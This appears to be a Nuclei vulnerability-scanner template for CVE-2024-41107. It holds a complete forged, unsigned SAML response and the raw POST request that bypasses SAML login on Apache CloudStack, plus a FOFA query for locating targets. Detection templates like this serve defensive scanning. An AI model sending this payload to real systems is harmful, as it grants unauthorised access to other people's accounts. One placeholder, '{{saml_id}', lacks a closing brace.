id: CVE-2024-41107

info:
  name: Apache CloudStack - SAML Signature Exclusion
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    The CloudStack SAML authentication (disabled by default) does not enforce signature check. In CloudStack environments where SAML authentication is enabled, an attacker that initiates CloudStack SAML single sign-on authentication can bypass SAML authentication by submitting a spoofed SAML response with no signature and known or guessed username and other user details of a SAML-enabled CloudStack user-account
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-41107
    - http://www.openwall.com/lists/oss-security/2024/07/19/1
    - http://www.openwall.com/lists/oss-security/2024/07/19/2
    - https://cloudstack.apache.org/blog/security-release-advisory-cve-2024-41107
    - https://github.com/apache/cloudstack/issues/4519
  classification:
    epss-score: 0.00046
    epss-percentile: 0.16798
  metadata:
    verified: true
    max-request: 1
    fofa-query: app="APACHE-CloudStack"
  tags: cve,cve2024,apache,cloudstack,auth-bypass

variables:
  username: "{{username}}"
  entityid: "{{entityid}}"
  saml_id: "{{saml_id}}"
  saml: '<?xml version="1.0" encoding="UTF-8"?><samlp:Response Destination="{{RootURL}}/client/api?command=samlSso"    ID="_b0389fca0ea65fe8e857" InResponseTo="{{saml_id}}"    IssueInstant="2024-07-30T10:48:20.307Z" Version="2.0"    xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" xmlns:xs="http://www.w3.org/2001/XMLSchema">    <saml:Issuer Format="urn:oasis:names:tc:SAML:2.0:nameid-format:entity"        xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion">{{entityid}}</saml:Issuer>    <samlp:Status xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol">        <samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success" />    </samlp:Status>    <saml:Assertion ID="_7a2993514112bbc72696" IssueInstant="2024-07-30T10:58:20.307Z" Version="2.0"        xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion"        xmlns:xs="http://www.w3.org/2001/XMLSchema">        <saml:Issuer Format="urn:oasis:names:tc:SAML:2.0:nameid-format:entity"            xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion">{{entityid}}</saml:Issuer>        <saml:Conditions NotBefore="2024-07-30T10:43:20.307Z"            NotOnOrAfter="2024-07-30T10:53:20.307Z"            xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion"><saml:AudienceRestriction>                <saml:Audience>org.apache.cloudstack</saml:Audience>            </saml:AudienceRestriction>        </saml:Conditions>        <saml:AuthnStatement AuthnInstant="2024-07-30T10:48:20.307Z"            SessionIndex="{{saml_id}"            xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion">            <saml:AuthnContext>                <saml:AuthnContextClassRef>                    urn:oasis:names:tc:SAML:2.0:ac:classes:PasswordProtectedTransport</saml:AuthnContextClassRef>            </saml:AuthnContext>        </saml:AuthnStatement>        <saml:AttributeStatement xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion">            <saml:Attribute Name="uid"                NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:unspecified">                <saml:AttributeValue xmlns:xs="http://www.w3.org/2001/XMLSchema"                    xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:type="xs:string">{{username}}</saml:AttributeValue>            </saml:Attribute>                    </saml:AttributeStatement>    </saml:Assertion></samlp:Response>'

http:
  - raw:
      - |
        POST /client/api?command=samlSso HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        RelayState=undefined&SAMLResponse={{urlencode(base64(saml))}}

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - "contains(header,'sessionkey')"
          - "contains(content_type,'text/xml')"
          - "status_code==302"
        condition: and
# digest: 4a0a00473045022100bba4f9d8bd13d7f88a72d393233b2bf209b17e02fb2ecad69d9fba3e6177cb180220391703c38491fdb8803df18e2a2e06720d705bdaf7323909112ca37e6360ef73:922c64590222798bb761d5b6d8e72950